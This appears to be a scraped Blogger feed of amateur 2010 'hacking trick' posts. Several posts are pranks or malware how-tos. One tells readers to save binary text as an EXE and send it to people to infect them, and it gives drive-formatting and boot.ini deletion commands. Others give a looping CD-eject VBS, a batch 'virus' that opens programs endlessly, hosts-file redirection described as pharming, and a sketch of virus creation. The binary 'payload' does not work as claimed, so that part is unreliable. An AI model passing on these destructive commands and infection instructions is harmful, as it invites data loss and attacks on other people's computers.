Following In Notepad Exactly as it says[format HDD]<br /><br />01001011000111110010010101010101010000011111100000<br /><br />Step 2. Save As An EXE Any Name Will Do<br />Step 3. Send the EXE to People And Infect<br /><br />try these also<br /><br />format c:\ /Q/X — this will format your drive c:\<br /><br />01100110011011110111001001101101011000010111010000<br />100000011000110011101001011100<br />0010000000101111010100010010111101011000<br /><br />del /F/S/Q c:\boot.ini — this will cause your computer not to boot.<br /><br />01100100011001010110110000100000001011110100011000<br />101111010100110010111101010001<br />00100000011000110011101001011100011000100110111101<br />101111011101000010111001101001<br />0110111001101001<br /><br />Try to figure out yourself rest<br />can’t spoonfeed<br />Its working.Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-52356473296329233422010-11-12T04:48:00.001-08:002010-11-12T04:48:36.180-08:00This is a VB Script to eject CD tray periodically like a joking virusType this code in notepad and save as all-files as "anyname.vbs". ==CODE below==do<br />Set oWMP = CreateObject("WMPlayer.OCX.7")<br />Set colCDROMs = oWMP.cdromCollection<br />If colCDROMs.Count >= 1 Then<br />For i = 0 To colCDROMs.Count - 1<br />colCDROMs.Item(i).Eject<br />Next ' cdrom<br />End If<br />loop And then open the VBS file see what will happen to your CD Drive ?Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-70496836793735489032010-11-12T04:44:00.000-08:002010-11-12T04:46:59.331-08:00Host Redirection...Now I'll add a little more...<br /><br />This is called "Host Redirection"...<br /><br />1. ping www.google.com...u will get the IP...<br /><br />2. just add "" in the host file...<br /><br />Ex: 10.20.3.133 www.yahoo.com<br /><br />3. Now try to open yahoo...the google page will be displayed...<br /><br />This method is use in PHARMING ATTACK...Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-57490955612716909732010-11-12T04:40:00.000-08:002010-11-12T04:44:48.621-08:00Block Websties By a simple logic, Steps:1] Browse C:\WINDOWS\system32\drivers\etc<br />2] Find the file named "HOSTS"<br />3] Open it in notepad<br />4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.dbrothersatyam.blocspot.com , and that site will no longer be accessable.<br />5] Done!<br />-So-<br />127.0.0.1 localhost<br />127.0.0.2 www.dbrothersatyam.blocspot.com<br />-->www.dbrothersatyam.blocspot.com is now unaccessable<--<br />For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.<br />IE: 127.0.0.3 www.dbrothersatyam.blocspot.com<br />127.0.0.4 www.dbrothersatyam.blocspot.com<br />127.0.0.5 www.dbrothersatyam.blocspot.com<br />etcSatyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-66061338650065665952010-11-12T04:38:00.001-08:002010-11-12T04:40:49.119-08:00haw can creat A Batch Virus...1. open a notepad.<br />2. write:<br /><br />@echo off<br />:loop<br />start notepad<br />start winword<br />start mspaint<br />start write<br />start cmd<br />start explorer<br />start control<br />start calc<br />goto loop<br /><br />3. save as anyname.bat.<br /><br />Run the Batch file...<br /><br />N.B: TO AVOID SYSTEM CRASH DELETE THE LOOP.<br /><br /><span style="font-weight:bold;">how can i create virus </span><br /><br />A computer virus is a computer program that can copy itself and infect a computer.<br /><br />First u have to think how would u infect the victim...<br /><br />Like crash the system or malfunction a program or create a back door or steal data...<br /><br />Then u need to develop the algorithm...<br /><br />Like the main logic development, registry patch, stealth mode etc...<br /><br />Last the coding...<br /><br />U can code in C, C++, Java Script, VB etc...<br /><br />But the ultimate requirement is Social Engineering...Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-31854782990088076872010-07-17T08:37:00.000-07:002010-07-17T08:38:31.155-07:00Chat With Command Prompt.If you want personal chat with a friend<br />you don't need to download any yahoo messenger<br />All you need is your friends IP address and Command Prompt.<br />Firstly, open Notepad and enter:<br />@echo off<br />:A<br />Cls<br />echo MESSENGER<br />set /p n=User:<br />set /p m=Message:<br />net send %n% %m%<br />Pause<br />Goto A<br />Now save this as "Messenger.bat". Open the .bat file and in Command<br />Prompt you should see:<br />MESSENGER<br />User:<br />After "User" type the IP address of the computer you want to contact.<br />After this, you should see this:<br />Message:<br />Now type in the message you wish to send.Before you press "Enter" it should look like this:<br />MESSENGER<br />User:27.196.391.193<br />Message: Hi<br />Now all you need to do is press "Enter", and start chatting!Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-5276544054149177492010-07-17T08:36:00.000-07:002010-07-17T08:37:38.152-07:00Block Websites Without Software.1] Browse C:\WINDOWS\system32\drivers\etc<br />2] Find the file named "HOSTS"<br />3] Open it in notepad<br />4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessible.<br />5] Done!<br />-So-<br />127.0.0.1 localhost<br />127.0.0.2 www.blockedsite.com<br />-->www.blockedsite.com is now inaccessible<--<br />For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.<br />IE: 127.0.0.3 www.xyz.com<br />127.0.0.4 www.abc.com<br />127.0.0.5 www.def.comSatyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-73990726820910937672010-07-17T08:25:00.000-07:002010-07-17T08:35:28.362-07:00Check time on the internet.Google search offer cool tool to find time of any place around the ground
<br />Just go to google.com and type any of the following
<br />
<br />time in new york
<br />time in delhi
<br />
<br />time in <<<any place>>
<br />
<br />you will get the the time..
<br />Its gud for people you need to adjust thier comp time after every reboot..
<br />this trick will not work for all cities and towns .However the following website can get the most
<br />www.worldtimezone.comSatyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-28790852554648475812010-07-17T08:20:00.000-07:002010-07-17T08:25:50.811-07:00Access restricted/blocked sites.you are in office or school or university campus where Certain website is blocked, either by the office administrator or by your organization then you can access it easily without any hassles. This can also be tried by users living in countries where a particular website is blocked by their ISP. There are 2 sites that can help:<br /><br />1.Just go to www.cooltunnel.com and type in the name of any site you want to access. This works for Orkut and other blocked sites too.<br />2.There is one more site www.gravitywars.com .This is updated regularly<br />you can also -- run àcmdàwrite à ping www.anything.com<br /><br />u'll gt th ip address. then jst copy nd paste it in the url box to open it.Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.com